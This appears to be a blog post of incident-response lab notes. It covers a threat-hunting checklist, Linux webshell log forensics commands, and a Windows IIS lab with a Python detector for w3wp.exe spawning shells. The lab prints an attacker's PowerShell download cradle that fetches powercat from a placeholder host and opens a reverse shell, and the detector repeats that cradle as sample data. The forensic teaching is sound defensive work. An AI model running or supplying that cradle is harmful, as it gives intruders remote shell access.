CyberLab-Eventlog

CyberLab event log analysis

  • Every action leaves a trace
    • File
    • Network
    • Process & memory

Threat hunting

Preparation > Detection and analysis > Removal and recovery > Post-incident review

Incident investigation approach

    • Identify who was attacked
    • Identify the attack source
    • Identify the incident category
    • Check whether it has happened before
    • Identify when the attack took place
    • Identify the network segment where it happened
    • Identify who has access
    • Identify how the system is normally managed
    • Identify what was created (files, accounts, processes)
    • Identify whether anything was exfiltrated

Forensics

  • History & logs
    • Shell history
    • Web access log
    • Event log
  • Process
    • Services
    • Connections
  • File
    • App (binary, script)
    • Autoruns
    • Config

Linux forensics (file: webshell)

  • Web service access logs:
    • mtime n : File’s data was last modified n minutes ago
    • atime n : File was last accessed n minutes ago.

    cat access |grep -i "200" |grep -i ".php" | cut -d " " -f 7 |sort |uniq -c |sort -nr |less

    cat access.log.2|grep -i '.php' | grep -Ei "s.php|admine21_decode.php" -B 10 | cut -d " " -f 1,4,7|less

    zless access.log.2.gz|grep -iE "\/s.php|admin21_decode.php" | cut -d " " -f 1 | sort |uniq

  • ps -ef
  • ls /proc
  • strace -f -p pid
  • lsof -i:port
  • lsof -p pid
  • crontab -e
  • cat /etc/rc.local
  • ls /etc/init.d
  • ls /etc/profile.d
  • ls /var/log/cron*
  • ls /var/log/secure*

Lab: Windows 7 IIS server forensics

  • History & logs
    • Web access log (IIS log)
    • Event log (4688, Sysmon)
  • Process
    • Services
    • Connections
  • File
    • App (binary, script)
    • Autoruns
    • Config
  • Execution history
    • Shimcache
    • Amcache

    IEX(new-object system.net.webclient).downloadstring('http://ip/powercat.ps1');powercat -c ip -p 4040 -e cmd.exe

  • Windows webshell
  • ParentProcessId: 3444
  • ParentImage: w3wp.exe
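The lab's key observation is the parent/child relationship: the IIS worker process w3wp.exe should never spawn cmd.exe or PowerShell. The following Python script is an added defender-side example (not part of the original lab notes) that scans constructed process-creation records in a flattened Sysmon Event ID 1 style for that pattern, walks the parent chain so grandchildren of w3wp.exe are also caught, and flags the in-memory download cradle seen in the lab (IEX + DownloadString). The flat record format, field names and sample records are assumptions; the pid 3444 is reused from the lab observation.

```python
import re
from typing import Dict, List

# Children of an IIS worker process that usually point to a webshell.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "whoami.exe", "net.exe"}
WEB_WORKERS = {"w3wp.exe"}
# Download-cradle markers (the lab payload uses IEX + DownloadString).
CRADLE_PATTERNS = re.compile(r"downloadstring|iex\b|invoke-expression|frombase64string", re.IGNORECASE)

# Constructed sample records, "Key: Value|Key: Value", resembling Sysmon Event ID 1 (assumed format).
SAMPLE_EVENTS = """\
EventID: 1|Image: C:\\Windows\\System32\\inetsrv\\w3wp.exe|ParentImage: C:\\Windows\\System32\\svchost.exe|ProcessId: 3444|ParentProcessId: 600|CommandLine: w3wp.exe -ap "DefaultAppPool"
EventID: 1|Image: C:\\Windows\\System32\\cmd.exe|ParentImage: C:\\Windows\\System32\\inetsrv\\w3wp.exe|ProcessId: 4120|ParentProcessId: 3444|CommandLine: cmd.exe /c whoami
EventID: 1|Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|ParentImage: C:\\Windows\\System32\\cmd.exe|ProcessId: 4188|ParentProcessId: 4120|CommandLine: powershell IEX(new-object system.net.webclient).downloadstring('http://ip/powercat.ps1')
EventID: 1|Image: C:\\Windows\\System32\\notepad.exe|ParentImage: C:\\Windows\\explorer.exe|ProcessId: 5000|ParentProcessId: 1200|CommandLine: notepad.exe
"""


def parse_event(line: str) -> Dict[str, str]:
    """Split one flat 'Key: Value|Key: Value' record into a dict."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition(": ")
        fields[key.strip()] = value.strip()
    return fields


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def flag_events(raw: str) -> List[Dict[str, str]]:
    """Return the records that look like webshell activity, each with a 'Reason' field."""
    events = [parse_event(l) for l in raw.splitlines() if l.strip()]
    by_pid = {e["ProcessId"]: e for e in events}  # lets us walk ParentProcessId chains
    flagged = []
    for e in events:
        reasons = []
        parent, child = basename(e.get("ParentImage", "")), basename(e.get("Image", ""))
        if parent in WEB_WORKERS and child in SUSPICIOUS_CHILDREN:
            reasons.append(f"{parent} spawned {child}")
        if CRADLE_PATTERNS.search(e.get("CommandLine", "")):
            reasons.append("download cradle in command line")
        # Walk up to five ancestors: a grandchild of w3wp.exe is just as suspicious as a child.
        ancestor, depth = by_pid.get(e.get("ParentProcessId")), 0
        while ancestor and depth < 5:
            if basename(ancestor.get("Image", "")) in WEB_WORKERS and parent not in WEB_WORKERS:
                reasons.append(f"descendant of {basename(ancestor['Image'])} (pid {ancestor['ProcessId']})")
                break
            ancestor, depth = by_pid.get(ancestor.get("ParentProcessId")), depth + 1
        if reasons:
            flagged.append({**e, "Reason": "; ".join(reasons)})
    return flagged


if __name__ == "__main__":
    for hit in flag_events(SAMPLE_EVENTS):
        print(hit["ProcessId"], basename(hit["Image"]), "->", hit["Reason"])
```

On the constructed sample the script flags pid 4120 (w3wp.exe spawned cmd.exe) and pid 4188 (download cradle, descendant of w3wp.exe) and ignores the notepad.exe record.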

https://luoming1995125.github.io/2021/09/17/CyberLab-Eventlog分析/
Author: Peter Luo
Published: 17 September 2021